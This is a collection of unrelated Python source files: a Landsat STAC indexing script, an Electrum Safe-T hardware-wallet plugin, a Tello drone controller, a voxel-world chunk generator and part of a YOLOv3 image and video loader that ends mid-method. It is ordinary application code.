if "MTL" in item.assets:
index_dataset(idx, s3, item.assets["MTL"]["href"], parse_only)
else:
logger.info("Item {} does not have an MTL asset (Sentinel2?) - skipping".format(item))
def worker(parse_only, queue):
s3 = boto3.resource("s3", config=Config(signature_version=UNSIGNED))
dc = datacube.Datacube()
idx = dc.index
while True:
try:
url = queue.get(timeout=60)
if url == STOP_SIGN:
break
logging.info("Processing {} {}".format(url, current_process()))
index_dataset(idx, s3, url, parse_only)
queue.task_done()
except Empty:
break
except EOFError:
break
def index_datasets_multi(items, parse_only=False):
manager = Manager()
queue = manager.Queue()
worker_count = cpu_count() * 2
processes = []
for i in range(worker_count):
proc = Process(target=worker, args=[parse_only, queue])
processes.append(proc)
proc.start()
for item in items:
if "MTL" in item.assets:
queue.put(item.assets["MTL"]["href"])
else:
logger.info("Item {} does not have an MTL asset (Sentinel2?) - skipping".format(item))
for i in range(worker_count):
queue.put(STOP_SIGN)
for proc in processes:
proc.join()
def parse_s3_url(url):
o = urlparse(url)
if o.netloc.startswith("s3"):
# https://s3-{region}.amazonaws.com/{bucket-name}/{key}
bucket_name, key = o.path.split("/", 2)[1:]
else:
# https://{bucket-name}.s3.amazonaws.com/{key}
bucket_name = o.netloc.split(".")[0]
key = o.path.split("/", 1)[1]
return bucket_name, key
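# Example (illustrative bucket/key values, not taken from a real query): both URL styles
# resolve to the same pair, e.g.
#   parse_s3_url("https://s3-us-west-2.amazonaws.com/landsat-pds/c1/L8/090/090/scene_MTL.txt")
#   parse_s3_url("https://landsat-pds.s3.amazonaws.com/c1/L8/090/090/scene_MTL.txt")
# both return ("landsat-pds", "c1/L8/090/090/scene_MTL.txt").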
@click.command()
@click.option('--extents', '-e', default="146.30,146.83,-43.54,-43.20", help="Extent to index in the form lon_min,lon_max,lat_min,latmax")
@click.option('--start_date', default="2013-02-11", help="Start date of the acquisitions to index, in YYYY-MM-DD format (UTC)")
@click.option('--end_date', default="2099-12-31", help="End date of the acquisitions to index, in YYYY-MM-DD format (UTC)")
@click.option('--single_process_only', is_flag=True, help="If true, multi-processing is disabled")
@click.option('--parse_only', '-p', is_flag=True, help="If true, scan STAC and parse MTL files, but do not index into datacube")
def index(extents, start_date, end_date, single_process_only, parse_only, write_extents=True):
lon_min, lon_max, lat_min, lat_max = map(float, extents.split(','))
if write_extents and not parse_only:
with open('/opt/odc/data/configIndex.txt', 'w') as outfile:
json.dump({'extent': [lon_min, lon_max, lat_min, lat_max]}, outfile)
srch = stac_search([lon_min, lat_min, lon_max, lat_max], start_date, end_date)
if not srch:
logging.error("STAC search failed, stopping.")
return
logging.info("Indexing datasets...")
if single_process_only:
index_datasets(srch.items(), parse_only)
else:
index_datasets_multi(srch.items(), parse_only)
logging.info("And we're done!")
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
logger.info("Starting the index process")
index()
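# Example command line (a sketch; the extent mirrors the defaults above, the dates are arbitrary):
#   python3 autoIndex.py --extents "146.30,146.83,-43.54,-43.20" \
#       --start_date 2018-01-01 --end_date 2018-12-31 --parse_only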
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
@runs_in_hwd_thread
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Chesscoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
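# For reference, the arithmetic above maps the wizard's choice index to a seed
# strength (TIM_NEW) or a recovery word count (TIM_RECOVER):
#   item = 0 -> 64*(0+2) = 128 bits / 6*(0+2) = 12 words
#   item = 1 -> 192 bits / 18 words, item = 2 -> 256 bits / 24 words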
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
tello.py
|
import socket
import threading
import time
import cv2
from easytello.stats import Stats
class Tello:
def __init__(self, tello_ip: str='192.168.10.1', debug: bool=True):
# Opening local UDP port on 8889 for Tello communication
self.local_ip = ''
self.local_port = 8889
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((self.local_ip, self.local_port))
# Setting Tello ip and port info
self.tello_ip = tello_ip
self.tello_port = 8889
self.tello_address = (self.tello_ip, self.tello_port)
self.log = []
# Initializing response thread
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon = True
self.receive_thread.start()
# easyTello runtime options
self.stream_state = False
self.MAX_TIME_OUT = 15.0
self.debug = debug
# Setting Tello to command mode
self.command()
def send_command(self, command: str, query: bool =False):
# New log entry created for the outbound command
self.log.append(Stats(command, len(self.log)))
# Sending command to Tello
self.socket.sendto(command.encode('utf-8'), self.tello_address)
# Displaying confirmation message (if 'debug' is True)
if self.debug is True:
print('Sending command: {}'.format(command))
# Checking whether the command has timed out or not (based on value in 'MAX_TIME_OUT')
start = time.time()
while not self.log[-1].got_response(): # Runs while no response has been received in log
now = time.time()
difference = now - start
if difference > self.MAX_TIME_OUT:
print('Connection timed out!')
break
# Prints out Tello response (if 'debug' is True)
if self.debug is True and query is False:
print('Response: {}'.format(self.log[-1].get_response()))
def _receive_thread(self):
while True:
# Checking for Tello response, throws socket error
try:
self.response, ip = self.socket.recvfrom(1024)
self.log[-1].add_response(self.response)
except socket.error as exc:
print('Socket error: {}'.format(exc))
def _video_thread(self, return_frame_flag):
# Creating stream capture object
cap = cv2.VideoCapture('udp://'+self.tello_ip+':11111')
# Runs while 'stream_state' is True
while self.stream_state:
ret, frame = cap.read()
cv2.imshow('DJI Tello', frame)
if return_frame_flag:
yield frame
# Video Stream is closed if escape key is pressed
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
def wait(self, delay: float):
# Displaying wait message (if 'debug' is True)
if self.debug is True:
print('Waiting {} seconds...'.format(delay))
# Log entry for delay added
self.log.append(Stats('wait', len(self.log)))
# Delay is activated
time.sleep(delay)
def get_log(self):
return self.log
# Control Commands
def command(self):
self.send_command('command')
def takeoff(self):
self.send_command('takeoff')
def land(self):
self.send_command('land')
def streamon(self,return_frame_flag=False):
self.send_command('streamon')
self.stream_state = True
# _video_thread can yield frames, which makes it a generator function; wrapping the call so the
# thread iterates it is a minimal fix that lets the capture loop actually run (not upstream easytello behaviour)
self.video_thread = threading.Thread(target=lambda: list(self._video_thread(return_frame_flag)))
self.video_thread.daemon = True
self.video_thread.start()
def streamoff(self):
self.stream_state = False
self.send_command('streamoff')
def emergency(self):
self.send_command('emergency')
# Movement Commands
def up(self, dist: int):
self.send_command('up {}'.format(dist))
def down(self, dist: int):
self.send_command('down {}'.format(dist))
def left(self, dist: int):
self.send_command('left {}'.format(dist))
def right(self, dist: int):
self.send_command('right {}'.format(dist))
def forward(self, dist: int):
self.send_command('forward {}'.format(dist))
def back(self, dist: int):
self.send_command('back {}'.format(dist))
def cw(self, degr: int):
self.send_command('cw {}'.format(degr))
def ccw(self, degr: int):
self.send_command('ccw {}'.format(degr))
def flip(self, direc: str):
self.send_command('flip {}'.format(direc))
def go(self, x: int, y: int, z: int, speed: int):
self.send_command('go {} {} {} {}'.format(x, y, z, speed))
def curve(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed))
# Set Commands
def set_speed(self, speed: int):
self.send_command('speed {}'.format(speed))
def rc_control(self, a: int, b: int, c: int, d: int):
self.send_command('rc {} {} {} {}'.format(a, b, c, d))
def set_wifi(self, ssid: str, passwrd: str):
self.send_command('wifi {} {}'.format(ssid, passwrd))
# Read Commands
def get_speed(self):
self.send_command('speed?', True)
return self.log[-1].get_response()
def get_battery(self):
self.send_command('battery?', True)
return self.log[-1].get_response()
def get_time(self):
self.send_command('time?', True)
return self.log[-1].get_response()
def get_height(self):
self.send_command('height?', True)
return self.log[-1].get_response()
def get_temp(self):
self.send_command('temp?', True)
return self.log[-1].get_response()
def get_attitude(self):
self.send_command('attitude?', True)
return self.log[-1].get_response()
def get_baro(self):
self.send_command('baro?', True)
return self.log[-1].get_response()
def get_acceleration(self):
self.send_command('acceleration?', True)
return self.log[-1].get_response()
def get_tof(self):
self.send_command('tof?', True)
return self.log[-1].get_response()
def get_wifi(self):
self.send_command('wifi?', True)
return self.log[-1].get_response()
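# Minimal usage sketch (assumes a Tello reachable at the default 192.168.10.1 and room to fly):
#   drone = Tello()
#   print(drone.get_battery())
#   drone.takeoff()
#   drone.cw(90)
#   drone.land()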
|
world.py
|
from terrain import *
from player import *
from core.renderer import *
import threading
import random
def execute_with_delay(func, delay):
threading.Timer(delay, func).start()
class ThreadedChunkGenerator:
def __init__(self, parent):
self.parent = parent
self.thread = threading.Thread(target=self.generate, daemon=True)
self.thread.start()
def generate(self):
while True:
if(len(self.parent.to_generate)-1) > 0:
chunk = self.parent.to_generate.pop(0)
storage = TerrainMeshStorage(self.parent.parent)
chunk.generate(storage)
chunk.process()
self.parent.parent.add(storage.vertices, storage.texCoords)
del storage
class World:
def __init__(self, renderer, player):
self.parent = renderer
self.chunks = {}
self.blocks = {}
self.position = (0 * 16, 0 * 16)
self.render_distance = 3
self.infgen_threshold = 1
self.block_types = all_blocks(renderer)
self.to_generate = []
self.player = player
self.generator = ThreadedChunkGenerator(self)
def block_exists(self, position):
return position in self.blocks
def _add_chunk(self, position):
self.chunks[position] = Chunk(self.parent, self, position)
self.to_generate.append(self.chunks[position])
def add_chunk(self, position):
execute_with_delay(lambda: self._add_chunk(position), random.randrange(1, 2))
def generate(self):
for i in range(self.position[0] - self.render_distance, self.position[0] + self.render_distance + 1):
for j in range(self.position[1] - self.render_distance, self.position[1] + self.render_distance + 1):
if (i, j) not in self.chunks:
self.add_chunk((i, j))
def update_infgen(self, position):
player_pos = (position[0] // 16, position[2] // 16)
if player_pos[0] - self.position[0] > self.infgen_threshold:
self.position = (self.position[0] + 1, self.position[1])
self.generate()
elif player_pos[0] - self.position[0] < -self.infgen_threshold:
self.position = (self.position[0] - 1, self.position[1])
self.generate()
if player_pos[1] - self.position[1] > self.infgen_threshold:
self.position = (self.position[0], self.position[1] + 1)
self.generate()
elif player_pos[1] - self.position[1] < -self.infgen_threshold:
self.position = (self.position[0], self.position[1] - 1)
self.generate()
def render(self):
self.parent.render()
self.update_infgen(self.player.pos)
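# Hedged usage sketch: World is driven by the engine's renderer and player objects, e.g.
#   world = World(renderer, player)
#   world.generate()   # seed the chunks around the starting position
# and then world.render() is called once per frame from the main loop.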
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
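# e.g. a 4000x3000 photo tagged with EXIF orientation 6 (rotated 270) or 8 (rotated 90)
# is reported as (3000, 4000) by exif_size().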
class LoadImages: # for inference
def __init__(self, path, img_size=416):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in ' + path
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
